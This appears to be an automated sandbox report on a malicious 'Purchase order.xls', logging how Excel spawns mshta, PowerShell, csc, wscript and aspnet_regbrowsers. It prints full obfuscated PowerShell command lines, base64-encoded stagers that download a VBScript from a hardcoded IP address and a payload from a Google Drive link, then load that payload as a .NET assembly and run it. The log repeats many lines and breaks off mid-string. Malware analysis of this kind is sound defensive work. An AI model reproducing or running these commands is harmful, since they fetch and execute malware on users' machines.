                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.................H.......@.......................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............. w........l....@.v.....(.P.....................................................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...H.......N.......................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............. w........l....@.v.....(.P.............................l.......................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ...............}..w............. w........l....@.v.....(.P.....................H...............................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...q.....}..w.............................1......(.P..............3......H...............................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................q.....}..w......q......................1......(.P.............d.......H...............................
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: Purchase order.xlsReversingLabs: Detection: 15%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AEA.tmp" "c:\Users\user\AppData\Local\Temp\lwndurzh\CSCC4D24F44B33B435588447526C34E647.TMP"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9251.tmp" "c:\Users\user\AppData\Local\Temp\3w1sxmqs\CSC4FC5C9177C1B495AB64B9617174E2B9E.TMP"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXeJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" Jump to behavior
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AEA.tmp" "c:\Users\user\AppData\Local\Temp\lwndurzh\CSCC4D24F44B33B435588447526C34E647.TMP"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.cmdline"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9251.tmp" "c:\Users\user\AppData\Local\Temp\3w1sxmqs\CSC4FC5C9177C1B495AB64B9617174E2B9E.TMP"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRo